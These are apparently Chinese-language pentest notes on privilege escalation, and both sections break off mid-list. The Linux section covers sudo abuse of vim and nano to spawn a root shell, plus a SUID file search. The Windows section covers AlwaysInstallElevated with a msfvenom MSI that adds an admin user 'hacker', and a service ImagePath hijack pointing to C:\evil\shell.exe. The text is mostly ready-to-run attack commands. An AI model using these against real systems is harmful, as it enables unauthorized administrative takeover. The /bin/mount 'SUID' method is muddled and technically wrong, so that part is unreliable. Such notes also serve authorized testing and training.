内网

常规提权方式 一、sudo滥用提权 sudo -l提示要输入密码的原因: 默认SUDO行为 : 需要输入当前用户的密码(不是root)密码 sudoers配置问题: 未配置免密码访问 在/etc/sudoers文件中没有为当前用户配置NOPASSWD选项 配置覆盖问题: 用户组覆盖了用户配置,可能被添加到了wheel用户组 检查当前用户所在组 id username 如果发现在wheel组中,检查wheel组的配置 查看%wheel相关配置,看是否设置了NOPASSWD或要求密码 sudo visudo 从wheel组中移除用户 sudo gpasswd -d username wheel 利用步骤： 查看当前用户sudo权限： sudo -l 示例输出：(ALL) NOPASSWD: /usr/bin/vim 利用vim提权： sudo /usr/bin/vim 在vim中输入 :set shell=/bin/bash 回车 然后输入 :shell 回车 成功获得root shell 利用其他命令提权： 如果发现可以执行/usr/bin/nano： sudo /usr/bin/nano 在nano中按Ctrl+R，输入!bash，回车 即可获得root shell 说明： sudo配置不当，允许用户以root身份执行特定命令，而无需密码验证。 二、SUID特殊权限提权 利用步骤： 查找SUID文件： find / -perm -u=s -type f 2>/dev/null 利用/bin/mount提权： mkdir /tmp/mount touch /tmp/mount/malicious_file sudo /bin/mount -o bind /tmp/mount /tmp/mount sudo /bin/mount /tmp/mount /tmp/mount 通过此方式可获取root权限 利用/bin/ping提权： ...

Windows工作组环境和域环境提权方式详解 一、工作组环境提权方式 1. AlwaysInstallElevated提权 条件： 系统已启用AlwaysInstallElevated（注册表值为1） 检查方法： reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 利用步骤： 生成恶意MSI文件（在Kali Linux中）： msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd -f msi -o add.msi 如果在Windows上操作，可以使用在线工具生成MSI文件 在Windows上执行： msiexec /i add.msi 验证提权： net user hacker 成功标志：看到hacker账户，且在管理员组中 2. 服务权限配置错误提权 条件： 服务路径权限配置错误 当前用户对服务可执行文件或目录有写权限 检查方法： sc query winpeas.exe quiet notcolor serviceinfo 利用步骤： 找到一个服务（如Spooler）： sc qc Spooler 修改服务路径： reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler" /t REG_EXPAND_SZ /v ImagePath /d "C:\evil\shell.exe" /f 重启服务： ...